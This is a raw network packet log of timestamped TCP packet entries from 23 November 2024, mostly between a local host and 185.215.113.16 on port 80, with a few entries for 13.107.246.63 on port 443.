                                                                                                                                                                                  Nov 23, 2024 19:52:48.868941069 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:48.872802019 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:48.872876883 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:48.872929096 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:48.873275995 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:48.873354912 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:48.873399019 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:48.874188900 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:48.874223948 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:48.874291897 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:48.875123978 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:48.927229881 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.033385038 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.033431053 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.033582926 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.033695936 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.033723116 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.033771992 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.034521103 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.034632921 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.034683943 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.035604954 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.035684109 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.035729885 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.036158085 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.036261082 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.036309004 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.037153959 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.037220955 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.037267923 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.038048029 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.038114071 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.038161039 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.038996935 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.039211035 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.039258957 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.040456057 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.040559053 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.040606022 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.041325092 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.041435957 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.041482925 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.041979074 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.042033911 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.042082071 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.042759895 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.042884111 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.042931080 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.043744087 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.044012070 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.044068098 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.044652939 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.044763088 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.044828892 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.045586109 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.045722008 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.045768976 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.046535015 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.046628952 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.046674013 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.047522068 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.047614098 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.047662020 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.048454046 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.048468113 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.048510075 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.049357891 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.049416065 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.049464941 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.050307989 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.050421000 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.050472021 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.050961971 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.051228046 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.051338911 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.051388979 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.051405907 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:49.051436901 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.051872015 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:49.051877975 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.052212000 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.052371025 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.052412033 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.053133011 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.053235054 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.053272009 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.054068089 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.054181099 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.054277897 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.055104017 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.055330038 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.055368900 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.056024075 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.056159973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.056197882 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.057070971 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.057230949 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.057276964 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.058463097 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.058561087 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.058609009 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.059228897 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.059257984 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.059299946 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.060178041 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.060318947 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.060360909 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.060821056 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.060884953 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.060920000 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.061711073 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.061813116 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.061872959 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.062861919 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.062997103 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.063044071 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.063621044 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.063913107 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.063955069 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.064462900 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.064713001 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.064770937 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.065470934 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.065532923 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.065573931 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.066371918 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.066481113 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.066526890 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.067290068 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.067344904 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.067389011 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.068308115 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.068346977 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.068393946 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.069158077 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.069309950 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.069358110 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.070128918 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.070270061 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.070343018 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.071089983 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.071206093 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.071248055 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.071975946 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.072021008 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.072068930 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.072948933 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.073052883 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.073101044 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.073860884 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.073975086 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.074019909 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.074862003 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.074980021 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.075026989 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.075834990 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.075917959 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.075958967 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.076711893 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.076922894 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.076970100 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.077647924 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.077769041 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.077810049 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.078588963 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.078763008 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.078799963 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.079556942 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.083307981 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.083364010 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.083528042 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.083740950 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.083780050 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.083851099 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.084692001 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.084736109 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.084863901 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.085624933 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.085683107 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.243897915 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.243998051 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.244052887 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.244354010 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.244592905 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.244606018 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.244651079 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.245449066 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.245517969 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.245544910 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.246407986 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.246484041 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.246505022 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.247298002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.247345924 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.247625113 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.247723103 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.247766972 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.248564959 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.248644114 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.248692989 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.249524117 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.249619007 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.249670029 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.250443935 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.250536919 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.250580072 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.251399994 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.251526117 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.251571894 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.252342939 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.252440929 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.252485037 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.253283978 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.253393888 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.253436089 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.254215002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.254282951 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.254323959 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.255181074 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.255279064 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.255332947 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.256139040 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.256217957 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.256263971 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.257091045 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.257190943 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.257234097 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.257993937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.258100986 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.258148909 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.258939028 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.259027958 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.259069920 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.259908915 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.259943008 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.259989977 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.260828018 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.260936975 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.260981083 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.261770964 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.261878014 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.261926889 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.262717962 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.262830973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.262875080 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.263674021 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.263755083 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.263797998 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.264605999 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.264678001 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.264728069 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.265533924 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.265647888 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.265695095 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.266545057 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.266679049 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.266726017 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.267446995 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.267539024 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.267580032 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.268374920 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.268435955 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.268476009 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.269350052 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.269545078 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.269598007 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.270235062 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.270344973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.270392895 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.271239996 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.271362066 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.271400928 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.272160053 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.272269964 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.272320986 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.273093939 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.273149014 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.273189068 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.274025917 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.274131060 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.274173975 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.274950027 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.275074005 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.275119066 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.275919914 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.276017904 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:49.276060104 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:49.276879072 CET8049760185.215.113.16192.168.2.7
